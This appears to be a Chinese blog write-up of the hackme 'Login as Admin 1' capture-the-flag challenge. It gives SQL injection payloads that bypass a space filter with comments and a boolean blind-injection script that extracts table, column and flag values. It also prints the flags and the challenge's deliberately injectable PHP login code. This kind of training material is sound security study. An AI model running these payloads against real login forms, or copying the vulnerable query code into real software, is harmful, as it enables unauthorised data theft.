[hackme] login as admin 1 && login as admin 1.2

最新推荐文章于 2023-03-16 20:26:17 发布
最新推荐文章于 2023-03-16 20:26:17 发布
阅读量1.3k 收藏
点赞数
分类专栏: hackme
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Selukwe/article/details/104613777
版权

题目链接:

https://hackme.inndy.tw/login1/

 

代码分析

1、过滤了空格,但可以用/**/绕过

 

2、题目不再提供表名。

 

3、从数据库查询之后,不会回显数据库中的内容(也就是无法用union select回显出来)

但跟上一题一样,构造出SQL查询之后,只要isadmin值为1,认为是admin,即获得flag1值。

 

解题步骤

1、利用union select构造出isadmin为1,获得flag1的值。

password=\'/**/union/**/select/**/1,2,3,1%23


2、前端不再回显数据库查询出来的用户名,而是原文返回post参数的用户名,也就是说,union select回显查询已经用不了。并且题目提示的是布尔注入,也就是盲注。
 

 

3、先从简单的payload开始构造,尝试能不能查出database(),获得数据库名称的长度是15。

password=\'/**/union/**/select/**/1,2,3,(1/(length(database())-15))%23


 

 

6、爆出数据库名称。
 

 

 

7、数据库名称为 login_as_admin1,该数据库一共有两个表。
 

第一个表名长度32,第二个是5。
 

 

8、爆所有表名
 

两张表分别是 0bdb54c98123f5526ccaed982d2006a9,users
 

 

9、猜测 flag2 就在0bdb54c98123f5526ccaed982d2006a9表中,重点关注这个表,一共有两个字段。
 

 

10、第一个字段名称长度2位,第二个字段名称有32位。。。出题人真是丧心病狂,看来flag2很可能就在第二个字段了。
 

 

11、先看看这张表有多少记录,结果只有一条。
 

 

12、有了表名还不行,得把列名称给爆出来。。重点爆第二个列名称,也就是limit设置1,1。

 

13、爆出了列名是4a391a11cfa831ca740cf8d00782f3a6,差点眼瞎,用count()函数验证一下是不是这个列名存在一条记录,如下图,验证成功,列名是正确的。

14、整理一下现在已经得到两个重要信息:
(1) 表名是0bdb54c98123f5526ccaed982d2006a9;
(2) 列名是4a391a11cfa831ca740cf8d00782f3a6。
(3) 只有一条记录,应该就是flag2值。

15、判断flag2的长度。

16、这道题目再一次丧心病狂,flag2居然有66位。。。继续爆

最终 intruder 中的 payload 如下:

name=testtest&password=\'/**/union/**/select/**/1,2,3,(1/(ascii(substr(((select/**/4a391a11cfa831ca740cf8d00782f3a6/**/from/**/0bdb54c98123f5526ccaed982d2006a9/**/limit/**/0,1)),§1§,1))-§32§))%23 

 

FLAG

FLAG{He110, Admin\\' or 1337 < 314159 #}
FLAG{W0W, You found the correct table and the flag, and UserAgent}


附录

<?php
require('config.php');
//require('WAF.php');

$ua = strtolower($_SERVER['HTTP_USER_AGENT']);
foreach($bad_ua as $bad) {
    if(strstr($ua, $bad)) {
        die("I don't like hackers. :(");
    }
}

if($_GET['show_source'] === '1') {
    highlight_file(__FILE__);
    exit;
}

function safe_filter($str)
{
    $strl = strtolower($str);
    if (strstr($strl, ' ') || strstr($strl, '1=1') || strstr($strl, "''") ||
        strstr($strl, 'union select') || strstr($strl, 'select ')
    ) {
        return '';
    }
    return str_replace("'", "\\'", $str);
}

$_POST = array_map(safe_filter, $_POST);

$user = null;

// connect to database

if(!empty($_POST['name']) && !empty($_POST['password'])) {
    $connection_string = sprintf('mysql:host=%s;dbname=%s;charset=utf8mb4', DB_HOST, DB_NAME);
    $db = new PDO($connection_string, DB_USER, DB_PASS);
    $sql = sprintf("SELECT * FROM `%s` WHERE `name` = '%s' AND `password` = '%s'",
        USER_TABLE,
        $_POST['name'],
        $_POST['password']
    );
    try {
        $query = $db->query($sql);
        if($query) {
            $user = $query->fetchObject();
        } else {
            $user = false;
        }
    } catch(Exception $e) {
        $user = false;
    }
}
?><!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Login As Admin 1</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="/bootstrap/css/bootstrap.min.css" media="all">
</head>
<body>
    <div class="jumbotron">
        <div class="container">
            <h1>Login as Admin 1</h1>
        </div>
    </div>

    <div class="container">
        <div class="navbar">
            <div class="container-fluid">
                <div class="navbar-header">
                    <a class="navbar-brand" href="/">Please Hack Me</a>
                </div>
                <ul class="nav navbar-nav">
                    <li>
                        <a href="/scoreboard">Scoreboard</a>
                    </li>
                    <li>
                        <a href="?show_source=1" target="_blank">Source Code</a>
                    </li>
                </ul>
            </div>
        </div>
    </div>

    <div class="container">
        <div class="col-md-6 col-md-offset-3">
<?php if(!$user): ?>
<?php if($user === false): ?>
            <div class="alert alert-danger">Login failed</div>
<?php endif; ?>
            <form action="." method="POST">
                <div class="form-group">
                    <label for="name">User:</label>
                    <input id="name" class="form-control" type="text" name="name" placeholder="User">
                </div>
                <div class="form-group">
                    <label for="password">Pass:</label>
                    <input id="password" class="form-control" type="text" name="password" placeholder="Password">
                </div>
                <div class="form-group">
                    <input class="form-control btn btn-primary" type="submit" value="Login">
                </div>
            </form>

            <div>
                <p>
                    You can login with <code>guest</code> / <code>guest</code>.
                </p>
            </div>
<?php else: ?>
            <h3>Hi, <?=htmlentities($_POST['name'])?></h3>

            <h4><?=sprintf("You %s admin!", $user->isadmin ? "are" : "are not")?></h4>

            <?php if($user->isadmin) printf("<code>%s</code>, %s", htmlentities($flag1), $where_is_flag2); ?>
<?php endif; ?>
        </div>
    </div>
</body>
</html>
色鹿
关注
专栏目录
hackme login as admin 0
weixin_43511698的博客
10-18 769
hackme 简单sql注入题 进入题目页面提示查看源码(关键代码如下) function safe_filter($str) { $strl = strtolower($str); if (strstr($strl, 'or 1=1') || strstr($strl, 'drop') || strstr($strl, 'update') || strstr($s...
/admin/login.php,app/admin/controller/Login.php · 静水流深/wotuoquan - Gitee.com
weixin_35006125的博客
04-08 1445
namespace app\admin\controller;use app\admin\model\User as UserModel;use app\common\controller\Common;use think\Controller;use think\Db;use think\Loader;use think\Request;use think\Url;use think\Sessi...
hackme_Login As Admin 1
weixin_30788239的博客
10-21 171
我一开始发现自己的注意力完全搞错了, 以为是可以以HTTP头为注入点,后来发现自己完全想多了、、、 其实这题难度不大,只要注意绕过空格的过滤(/**/)即可, 具体原理见笔者另一篇随笔https://www.cnblogs.com/huangming-zzz/p/9818486.html中的“限制查询注入” 本题payload如下:   user:\'/**/or/*...
login as admin 01
weixin_43511698的博客
10-18 1521
hackme login as admin 01 login as admin 01 此题与login as admin 0 有联系 使用 union 注入 查看一共几行 ’ union select 1# ’ union select 1,2# ’ union select 1,2,3# ’ union select 1,2,3,4# 此时出现回显2 说明数据库在第二行 接下来共四步(查看数据...
[hackme] login as admin 0 && login as admin 0.1
Selukwe的博客
03-02 755
题目链接: https://hackme.inndy.tw/login0/ 前期思路: 提示漏洞是SQL注入,还有一个guest/guest账号可以登录,要用admin(或者说admin权限)来登录。 解题过程: 1、尝试了单引号注入,发现前端可以将sql语句输出,并且字符转义了。 2、一波尝试注入之后,直接去看了代码。发现后端并没有用addslashes对所...
hackme_Login As Admin 7
weixin_30628077的博客
10-23 155
0E开头的MD5弱比较 (如果哈希值中有e,且e前面是0,后面是纯数字,那么会当成科学记数法来处理,也就是0的...次方依然为零) 这篇文章有比较详细的介绍:http://www.freebuf.com/news/67007.html 下面是0e开头md5值: http://www.mamicode.com/info-detail-1719711.html payl...
192.168.1.2 Login Admin-crx插件
04-03
192.168.1.2登录管理员。 它是一个私有IPv4网络地址,可以更改默认路由器设置 192.168.1.2 IP是一个私有IP地址,用于调制解调器或无线路由器的默认登录IP。 此默认登录IP特定于调制解调器或无线路由器。 通过在...
login_admin_green
10-28
login_admin_green 用户登录
Flask-Admin + Flask-Login 采坑指南
weixin_42443066的博客
05-20 3095
版本 Flask-Login 0.4.1 Flask-Admin 1.5.3 Flask-SQLAlchemy 2.3.2 Flask 1.0.2 Flask-Login 1. 必须 要加载的用户类继承UserMixin 用户类要实现的方法 def get_id(self): return self.id @pro...
login as sysdba
cneo2012的博客
08-29 113
不管用什么as sysdba,最终都归于以sys用户登录1 conn其他用户conn">sys@ora10g>conn ring/ring as sysdba已连接。show">sys@ora10g>...
linux login as,PuTTY登录后SSH提示login as怎么回事?
weixin_35656285的博客
05-28 7710
2017年8月27日PuTTY登录后SSH提示login as怎么回事?PuTTY登录后,显示提示“login as:”,请输入你的用户名(管理员用户名root),然后按下回车键;出现输入密码提示,请直接输入SSH密码,此时不会显示密码或星号,你直接输入即可,然后回车键,登录成功!不用密码登录以下是设置PuTTY用Private key登录1)PuTTY→Session:填写Host Name(O...
putty远程连接树莓派无提示信息“login as”
最新发布
yang_cptbtptp的博客
03-16 587
putty远程连接树莓派无提示信息“login as”,最终解决
hackme_Login As Admin 0
weixin_30448603的博客
10-19 201
先上payload, 再说原理 1、 Username:\' union select 1,1,1,1# Password:a 2、 Username:\' or 1 limit1,1# Password:a 下面是分析讲解: 首先,点击Source Code按钮查看源代码 可以得到以下信息: 1、过滤了单引号,可以用\'来绕过滤 2、user表中四个列:id...
2021-01-22
m0_53314778的博客
01-22 370
[HCTF 2018]admin websocket,wsgi,flask,web框架,它们之间到底是什么关系? 作者:ccloomi 链接:https://www.zhihu.com/question/323016192/answer/732591578 来源:知乎 著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。 假如我们要做一个网站,先从最简单的开始,这个网站就一个页面好了,简单的html+css。然后网站部署在公司的一台服务器上。这台服务器就称为web服务器。要访问这个网站我们只
CTF刷题04
Atkx's Blog
10-11 3166
RSA1 这道题属于已知p、q、dp、dq、c求明文类型 上脚本 p = 8637633767257008567099653486541091171320491509433615447539162437911244175885667806398411790524083553445158113502227745206205327690939504032994699902053229 q = 1264067497399647276917604793717088342092705082148001058159
记一道CTF 中遇到的SQL注入新型万能密码问题
大方子
10-09 8310
0x00. 引言 我们平时遇到的SQL注入万能密码都是形如admin' or '1'='1, 这种使用or 关键字使得查询结果永真,或者形如:' UNION Select 1,1,1 FROM admin Where ''=',这种使用union使得查询结果永真, 但是有一次我在CTF的比赛中遇到的SQL注入问题,使用这两种万能密码都不好使,不管怎么变换形式,都不好使,显然是or和union ...
BUUCTF——[HCTF 2018]admin
Ho1aAs‘s Blog
05-16 846
文章目录利用点审题解题——Flask session解2——Unicode编码欺骗解3——(非预期)弱口令爆破参考完 利用点 Flask session Unicode编码欺骗 (非预期)弱口令爆破 审题 打开环境,主页仅提供了login和register两项服务,hctf的超链接打开是404 提示那么少,先看看主页的源码 结合题目以及提示,可以断定是要登录管理员账户,先注册一个账户,看看登录有些什么内容 新增了post和change password功能,在change password找到hin
43. CTFHub Web_密码口令
__Qian的博客
03-23 849
1.弱口令 1.打开页面链接 这里可以使用burp进行暴力破解,输入admin/password,即可获取flag 2.默认口令 1.打开页面后,发现是亿邮邮件网关,经百度查询,查到默认帐号密码如下,挨个进行尝试后,发现eyougw/admin@(eyou)为帐号密码 2.输入帐号密码验证码后,得到flag ​ ...
hackinglab.cn 注入关之一
r00tnb的博客
12-15 3793
题目: Tips题目里有简单提示. writeup: 第一关应该挺简单的。 点击题目地址进去,显示的是一个简单的登陆界面,还有一个验证码。 查看一下源代码,发现有一个提示: &lt;!-- Tips login as admin--&gt; 也就是说登录名已经告诉你了。 开始填写表单,登录名就写admin,密码随便填,验证码输入正确,等待返回结果是登录失败!预料之中,在登录名...
Flask-Admin快速入门:构建自定义管理界面
"Flask-Admin是Python Flask框架的一个强大扩展,用于构建管理界面。它提供了高度自定义的灵活性,让开发者能够完全控制应用的外观、感觉和功能,类似于Django的admin接口。本文旨在为已有Flask基础的读者提供Flask-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值